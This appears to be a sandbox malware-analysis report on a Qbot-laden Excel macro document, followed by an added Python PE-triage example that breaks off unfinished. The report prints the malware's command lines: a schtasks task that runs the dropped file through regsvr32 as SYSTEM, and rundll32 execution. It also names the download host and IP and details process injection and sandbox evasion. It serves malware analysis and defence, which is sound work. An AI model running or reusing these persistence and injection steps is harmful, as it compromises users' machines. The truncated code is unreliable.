Source: Joe Sandbox View | Dropped File: C:\Users\user\iojhsfgv.dvers 9E6B6797944DD3EDD500BC13B5CDF9B74B9AFD215C9BED6EF3BEC26DB4396A7B
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: String function: 008A3E98 appears 76 times
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: String function: 008A5F7C appears 61 times
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: String function: 008A344C appears 34 times
Source: iojhsfgv.dvers.5.dr | Static PE information: No import functions for PE file found
Source: document-1055791644.xls, type: SAMPLE | Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: rundll32.exe, 00000003.00000002.2109070891.0000000001C20000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2102690700.0000000001FB0000.00000002.00000001.sdmp | Binary or memory string: .VBPud<_
Source: classification engine | Classification label: mal100.troj.expl.evad.winXLS@18/14@1/1
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_008BD3AC GetLastError,FormatMessageA,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_008F5FA8 EntryPoint,GetDiskFreeSpaceExA,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_00430483 CreateToolhelp32Snapshot,lstrcpynA,lstrcpynA,memset,GetOEMCP,GetOEMCP,lstrcpynA,Process32First,GetOEMCP,lstrcpynA,GetOEMCP,Process32Next,GetOEMCP,CloseHandle,lstrcpynA,lstrlenA,GetCurrentProcessId,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_00436EC8 MultiByteToWideChar,CoInitializeEx,lstrcpynA,CoInitializeSecurity,lstrcpynA,lstrlenA,GetCurrentProcessId,GetOEMCP,GetOEMCP,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,lstrcpynA,SysAllocString,GetOEMCP,MultiByteToWideChar,lstrcpynA,CoSetProxyBlanket,lstrlenA,GetCurrentProcessId,MultiByteToWideChar,MultiByteToWideChar,lstrlenA,GetCurrentProcessId,lstrlenA,GetCurrentProcessId,lstrcpynA,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_0042B14A lstrlenA,FindResourceA,lstrlenA,GetCurrentProcessId,GetOEMCP,GetOEMCP,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,lstrlenA,GetCurrentProcessId,lstrlenA,GetCurrentProcessId,GetOEMCP,GetOEMCP,GetOEMCP,MultiByteToWideChar,GetOEMCP,MultiByteToWideChar,lstrlenA,GetCurrentProcessId,lstrcpynA,MultiByteToWideChar,
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Desktop\C7DE0000
Source: C:\Windows\SysWOW64\explorer.exe | Mutant created: \Sessions\1\BaseNamedObjects\{356EE3B6-3452-4DAA-AF55-F855E45BD2D8}
Source: C:\Windows\SysWOW64\explorer.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\{E72AFEF2-4BAA-4359-AC99-886389190D2C}
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRCEA4.tmp
Source: document-1055791644.xls | OLE indicator, Workbook stream: true
Source: C:\Windows\SysWOW64\schtasks.exe | Console Write: ....................4.%..........&k.....(.P.....p........................x................................................................%.....
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\rundll32.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\rundll32.exe rundll32 ..\iojhsfgv.dvers,DllRegisterServer
Source: document-1055791644.xls | Virustotal: Detection: 51%
Source: document-1055791644.xls | ReversingLabs: Detection: 47%
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\rundll32.exe rundll32 ..\iojhsfgv.dvers,DllRegisterServer
Source: C:\Windows\System32\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\iojhsfgv.dvers,DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\explorer.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn wwzkbggu /tr 'regsvr32.exe -s \'C:\Users\user\iojhsfgv.dvers\'' /SC ONCE /Z /ST 18:42 /ET 18:54
Source: unknown | Process created: C:\Windows\System32\taskeng.exe taskeng.exe {E6DEB525-2047-4F0F-A2D9-FEDA7F895D14} S-1-5-18:NT AUTHORITY\System:Service:
Source: C:\Windows\System32\taskeng.exe | Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\iojhsfgv.dvers'
Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\iojhsfgv.dvers'
Source: C:\Windows\System32\taskeng.exe | Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\iojhsfgv.dvers'
Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\iojhsfgv.dvers'
Source: C:\Windows\System32\taskeng.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{92BDB7E4-F28B-46A0-B551-45A52BDD5125}\InprocServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: C:\Windows\SysWOW64\explorer.exe | File created: C:\Users\user\iojhsfgv.dvers
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\0702[1].gif
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\iojhsfgv.dvers

Boot Survival:

Drops PE files to the user root directory
Source: C:\Windows\SysWOW64\explorer.exe | File created: C:\Users\user\iojhsfgv.dvers
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Windows\SysWOW64\explorer.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn wwzkbggu /tr 'regsvr32.exe -s \'C:\Users\user\iojhsfgv.dvers\'' /SC ONCE /Z /ST 18:42 /ET 18:54

Hooking and other Techniques for Hiding and Protection:

Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 2508 base: 57102D value: E9 A4 61 B1 FF
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_008F0004 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_008DA520 PostMessageA,PostMessageA,SendMessageA,70D9FFF6,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_008F0928 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_008DACF0 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_008DAC40 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_008D7548 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_008EF750 IsIconic,GetCapture,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_008C1D04 IsIconic,GetWindowPlacement,GetWindowRect,
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\explorer.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains functionality to detect sleep reduction / modifications
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_008CEF08
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_00430483 CreateToolhelp32Snapshot,lstrcpynA,lstrcpynA,memset,GetOEMCP,GetOEMCP,lstrcpynA,Process32First,GetOEMCP,lstrcpynA,GetOEMCP,Process32Next,GetOEMCP,CloseHandle,lstrcpynA,lstrlenA,GetCurrentProcessId,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\0702[1].gif
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_008CEF08
Source: C:\Windows\SysWOW64\explorer.exe TID: 2296 | Thread sleep time: -104000s >= -30000s
Source: C:\Windows\System32\taskeng.exe TID: 2792 | Thread sleep time: -60000s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe | Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_00431217 lstrlenA,GetCurrentProcessId,lstrlenA,GetCurrentProcessId,lstrlenA,GetCurrentProcessId,FindFirstFileW,MultiByteToWideChar,GetOEMCP,lstrlenA,GetCurrentProcessId,lstrlenA,GetCurrentProcessId,lstrcpynA,MultiByteToWideChar,MultiByteToWideChar,lstrcpynA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,FindNextFileW,GetOEMCP,lstrcpynA,GetOEMCP,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_008A4F40 GetModuleHandleA,70D9FFF6,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_00091217 lstrlenA,GetCurrentProcessId,lstrlenA,GetCurrentProcessId,lstrlenA,GetCurrentProcessId,FindFirstFileW,MultiByteToWideChar,GetOEMCP,lstrlenA,GetCurrentProcessId,lstrlenA,GetCurrentProcessId,lstrcpynA,MultiByteToWideChar,MultiByteToWideChar,lstrcpynA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,FindNextFileW,GetOEMCP,lstrcpynA,GetOEMCP,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_00435986 lstrlenA,GetOEMCP,GetSystemInfo,lstrlenA,lstrlenA,GetCurrentProcessId,lstrlenA,GetCurrentProcessId,GetOEMCP,MultiByteToWideChar,
Source: rundll32.exe, 00000004.00000002.2102558977.00000000004DF000.00000004.00000020.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: rundll32.exe, 00000004.00000002.2102558977.00000000004DF000.00000004.00000020.sdmp | Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_00430483 CreateToolhelp32Snapshot,lstrcpynA,lstrcpynA,memset,GetOEMCP,GetOEMCP,lstrcpynA,Process32First,GetOEMCP,lstrcpynA,GetOEMCP,Process32Next,GetOEMCP,CloseHandle,lstrcpynA,lstrlenA,GetCurrentProcessId,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_000875E6 RtlAddVectoredExceptionHandler,
Source: C:\Windows\SysWOW64\rundll32.exe | Memory protected: page write copy | page execute | page execute read | page execute and read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

Allocates memory in foreign processes
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: C0000 protect: page read and write
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 2508 base: C0000 value: 9C
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 2508 base: 57102D value: E9
Maps a DLL or memory area into another process
Source: C:\Windows\SysWOW64\rundll32.exe | Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\explorer.exe base: C0000
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\explorer.exe base: 57102D
Yara detected hidden Macro 4.0 in Excel
Source: Yara match | File source: document-1055791644.xls, type: SAMPLE
Source: C:\Windows\System32\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\iojhsfgv.dvers,DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\explorer.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn wwzkbggu /tr 'regsvr32.exe -s \'C:\Users\user\iojhsfgv.dvers\'' /SC ONCE /Z /ST 18:42 /ET 18:54
Source: C:\Windows\System32\taskeng.exe | Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\iojhsfgv.dvers'
Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\iojhsfgv.dvers'
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_00433630 lstrlenA,GetCurrentProcessId,lstrlenA,GetCurrentProcessId,lstrcpynA,lstrlenA,GetCurrentProcessId,lstrlenA,GetCurrentProcessId,MultiByteToWideChar,GetOEMCP,lstrlenA,lstrlenA,GetCurrentProcessId,LocalAlloc,lstrlenA,GetCurrentProcessId,lstrlenA,GetCurrentProcessId,GetOEMCP,GetOEMCP,GetOEMCP,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetOEMCP,lstrcpynA,GetOEMCP,MultiByteToWideChar,MultiByteToWideChar,lstrlenA,GetCurrentProcessId,lstrlenA,GetCurrentProcessId,
Source: explorer.exe, 00000005.00000002.2371071962.0000000000ED0000.00000002.00000001.sdmp | Binary or memory string: Program Manager
Source: explorer.exe, 00000005.00000002.2371071962.0000000000ED0000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000005.00000002.2371071962.0000000000ED0000.00000002.00000001.sdmp | Binary or memory string: !Progman
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetLocaleInfoA,GetACP,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetLocaleInfoA,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetLocaleInfoA,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetLocaleInfoA,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetLocaleInfoA,
Source: C:\Windows\SysWOW64\rundll32.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\explorer.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_0042E9CF GetSystemTimeAsFileTime,GetOEMCP,GetOEMCP,MultiByteToWideChar,GetOEMCP,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_004388FD lstrcpynA,lstrcpynA,lstrcpynA,lstrlenA,GetCurrentProcessId,GetOEMCP,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,LookupAccountNameW,lstrcpynA,MultiByteToWideChar,lstrcpynA,LookupAccountNameW,MultiByteToWideChar,lstrlenA,GetCurrentProcessId,lstrcpynA,lstrlenA,GetCurrentProcessId,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_00435A4F GetOEMCP,GetOEMCP,MultiByteToWideChar,GetOEMCP,lstrcpynA,GetCurrentProcessId,MultiByteToWideChar,GetTickCount,GetModuleFileNameW,lstrlenA,GetOEMCP,lstrlenA,GetCurrentProcessId,GetCurrentProcess,GetOEMCP,lstrlenA,GetCurrentProcessId,lstrlenA,GetCurrentProcessId,lstrlenA,GetCurrentProcessId,GetOEMCP,GetOEMCP,lstrlenA,GetCurrentProcessId,LookupAccountSidW,GetLastError,GetSystemMetrics,GetModuleFileNameW,MultiByteToWideChar,GetOEMCP,GetOEMCP,MultiByteToWideChar,GetOEMCP,MultiByteToWideChar,GetOEMCP,lstrlenW,GetOEMCP,GetOEMCP,lstrlenA,GetCurrentProcess,lstrcpynA,memset,MultiByteToWideChar,lstrlenA,GetCurrentProcessId,GetVersionExA,lstrlenA,GetCurrentProcessId,GetCurrentProcess,GetOEMCP,GetOEMCP,lstrcpynA,lstrcpynA,GetWindowsDirectoryW,lstrlenA,GetCurrentProcessId,GetOEMCP,lstrlenA,GetCurrentProcessId,lstrlenA,GetCurrentProcessId,lstrlenA,GetCurrentProcessId,lstrcpynA,lstrlenA,GetCurrentProcessId,MultiByteToWideChar,lstrlenA,GetCurrentProcessId,lstrcpynA,lstrlenA,GetCurrentProcessId,lstrlenA,GetCurrentProcessId,lstrlenA,lstrcpynA,MultiByteToWideChar,lstrlenA,GetCurrentProcessId,MultiByteToWideChar,lstrlenA,GetCurrentProcessId,lstrcpynA,
                      Source: C:\Windows\System32\taskeng.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information:

Yara detected Qbot
                      Source: Yara matchFile source: 00000004.00000002.2102507416.0000000000420000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2102454877.0000000000230000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2102490286.00000000003E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2370755015.0000000000080000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 4.2.rundll32.exe.230174.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.420000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.420000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.230174.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.explorer.exe.80000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.3e0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.explorer.exe.80000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.3e0000.2.unpack, type: UNPACKEDPE

                      Remote Access Functionality:

Yara detected Qbot
                      Source: Yara matchFile source: 00000004.00000002.2102507416.0000000000420000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2102454877.0000000000230000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2102490286.00000000003E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2370755015.0000000000080000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 4.2.rundll32.exe.230174.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.420000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.420000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.230174.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.explorer.exe.80000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.3e0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.explorer.exe.80000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.3e0000.2.unpack, type: UNPACKEDPE

                      Mitre Att&ck Matrix

Each tactic below lists the techniques in its column of the original matrix. A number in parentheses is the signature-count badge the matrix showed on that technique, reproduced as extracted (adjacent badges ran together in extraction, so "412" is the badge digits as they appeared, not a single count). Techniques without a badge had no matching signature.

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: Scripting (11); Exploitation for Client Execution (33); Command and Scripting Interpreter (1); Scheduled Task/Job (1); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter; PowerShell
Persistence: Scheduled Task/Job (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux)
Privilege Escalation: Extra Window Memory Injection (1); Process Injection (412); Scheduled Task/Job (1); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux)
Defense Evasion: Disable or Modify Tools (11); Deobfuscate/Decode Files or Information (1); Scripting (11); Obfuscated Files or Information (2); Extra Window Memory Injection (1); Masquerading (121); Virtualization/Sandbox Evasion (1); Process Injection (412); Rundll32 (1)
Credential Access: Credential API Hooking (1); Input Capture (11); Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: System Time Discovery (1); Account Discovery (1); File and Directory Discovery (2); System Information Discovery (27); Security Software Discovery (231); Virtualization/Sandbox Evasion (1); Process Discovery (2); Application Window Discovery (11); System Owner/User Discovery (1)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot; Software Deployment Tools
Collection: Archive Collected Data (1); Screen Capture (1); Credential API Hooking (1); Input Capture (11); Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Command and Control: Ingress Tool Transfer (1); Encrypted Channel (12); Non-Application Layer Protocol (1); Application Layer Protocol (2); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols; Rogue Cellular Base Station
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue; Data Destruction

                      Behavior Graph

Behavior Graph ID: 382839. Sample: document-1055791644.xls. Start date: 06/04/2021. Architecture: WINDOWS. Score: 100.

Signatures attached to the sample node: Found malware configuration; Multi AV Scanner detection for dropped file; Sigma detected: Schedule REGSVR windows binary; 9 other signatures.

Process tree recovered from the graph (node numbers are those of the original graph):

• EXCEL.EXE (node 9)
  • contacts tidymasters.com.au, 103.50.162.157:443 (local port 49165), PUBLIC-DOMAIN-REGISTRYUS, India (node 39)
  • drops C:\Users\user\AppData\Local\...\0702[1].gif, PE32 (node 35)
  • signature: Document exploit detected (UrlDownloadToFile) (node 57)
  • starts rundll32.exe (node 16)
    • starts rundll32.exe (node 22)
      • signatures: Overwrites code with unconditional jumps - possibly settings hooks in foreign process (node 49); Injects code into the Windows Explorer (explorer.exe) (node 51); Writes to foreign memory regions (node 53); 3 other signatures (node 55)
      • starts explorer.exe (node 29)
        • drops C:\Users\user\iojhsfgv.dvers, PE32 (node 37)
        • signatures: Drops PE files to the user root directory (node 59); Uses schtasks.exe or at.exe to add and modify task schedules (node 61)
        • starts schtasks.exe (node 33)
• taskeng.exe (node 14)
  • starts regsvr32.exe (node 18)
    • starts regsvr32.exe (node 25)
  • starts regsvr32.exe (node 20)
    • starts regsvr32.exe (node 27)


                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

Source | Detection | Scanner | Label
document-1055791644.xls | 52% | Virustotal |
document-1055791644.xls | 48% | ReversingLabs | Document-Word.Trojan.Abracadabra

                      Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\0702[1].gif | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\0702[1].gif | 30% | Metadefender |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\0702[1].gif | 93% | ReversingLabs | Win32.Trojan.QBot
C:\Users\user\iojhsfgv.dvers | 5% | Metadefender |
C:\Users\user\iojhsfgv.dvers | 11% | ReversingLabs |
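Both dropped files in the table above are PE32 images stored under non-executable names: 0702[1].gif in the IE download cache (the UrlDownloadToFile payload) and iojhsfgv.dvers directly in the user profile root. The following Python is an added example and not part of the Joe Sandbox report: it reads just enough of a PE header (DOS stub, PE signature, COFF header, optional-header magic) to classify a file and flags the two signals this report shows, extension mismatch and a PE dropped in the profile root. The byte blobs are synthetic headers constructed inline for the example; nothing here is the real dropped file, and the paths are reused from the report only as labels.

```python
from __future__ import annotations
import struct
from pathlib import PureWindowsPath

# Extensions under which a PE image is normally expected to live.
PE_EXTENSIONS = {".exe", ".dll", ".sys", ".ocx", ".scr", ".cpl", ".drv", ".ax"}
IMAGE_FILE_DLL = 0x2000                      # COFF Characteristics flag
PE32_MAGIC, PE32PLUS_MAGIC = 0x10B, 0x20B    # optional header magic values


def parse_pe(data: bytes) -> dict | None:
    """Return machine/section/DLL/bitness facts from raw bytes, or None if not a PE image."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    # COFF file header (20 bytes): Machine, NumberOfSections, TimeDateStamp,
    # PointerToSymbolTable, NumberOfSymbols, SizeOfOptionalHeader, Characteristics.
    machine, nsections, _, _, _, opt_size, characteristics = struct.unpack_from(
        "<HHIIIHH", data, e_lfanew + 4)
    opt_off = e_lfanew + 24
    magic = 0
    if opt_size >= 2 and opt_off + 2 <= len(data):
        (magic,) = struct.unpack_from("<H", data, opt_off)
    return {
        "machine": machine,
        "sections": nsections,
        "is_dll": bool(characteristics & IMAGE_FILE_DLL),
        "bitness": {PE32_MAGIC: "PE32", PE32PLUS_MAGIC: "PE32+"}.get(magic, "unknown"),
    }


def triage(path: str, data: bytes) -> dict:
    """Classify a dropped file and list the signals worth escalating."""
    p = PureWindowsPath(path)
    pe = parse_pe(data)
    findings = []
    if pe is not None:
        if p.suffix.lower() not in PE_EXTENSIONS:
            findings.append(f"PE image stored with non-executable extension {p.suffix or '(none)'}")
        # C:\Users\<name>\<file> splits into ('C:\\', 'Users', '<name>', '<file>').
        if len(p.parts) == 4 and p.parts[1].lower() == "users":
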